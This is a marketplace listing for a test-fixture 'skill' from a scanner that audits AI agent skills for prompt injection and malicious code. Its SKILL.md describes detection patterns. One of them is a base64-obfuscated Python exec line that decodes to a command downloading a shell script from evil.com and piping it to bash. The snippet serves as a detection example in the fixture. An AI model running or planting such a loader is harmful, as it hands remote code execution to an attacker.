agentsclimarketplace

Benign

Skill ondrej-merkun/skill-audit/test/fixtures/OBFS-EVAL-ATOB/benign

Scan every AI agent skill on your machine for prompt injection and malicious code. Fast local rules by default, with optional local LLM review for deeper context.From the repository description

Install
npx -y skills add ondrej-merkun/skill-audit --skill benign

Assembled from the repository path, not quoted from the project. Check it against their README if it does not work.

2 things to look at

  • no licenseNo license file was found in the repository. Code published without one is not open source by default, so using it at work is a question for whoever answers licensing questions where you are.
  • 3 stars3 stars. Stars are a popularity signal and not a quality one, but at this level it is likely that nobody has read this closely except its author, and you would be relying on your own review.

SKILL.md

0.3 KB, 123 tokens by cl100k_base, as published. Nobody here has run it

Security scanner docs

Detection: Scan for outbound HTTP in all code paths, not just obvious locations.

Pattern 2: The Obfuscated Payload

import base64, codecs
# Looks like a config string
_c = "aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2N1cmwgaHR0cDovL2V2aWwuY29tL3NoZWxsLnNoIHwgYmFzaCcp"
exec(base64.b64decode(_c))

What ships with it: 3 files

782 B alongside SKILL.md, 3 of them executable

Keep looking

Skills are one crate of 326,537. Ordering is by how many stacks a row turns up in, so the top of any crate is what has actually been picked rather than what has the most stars.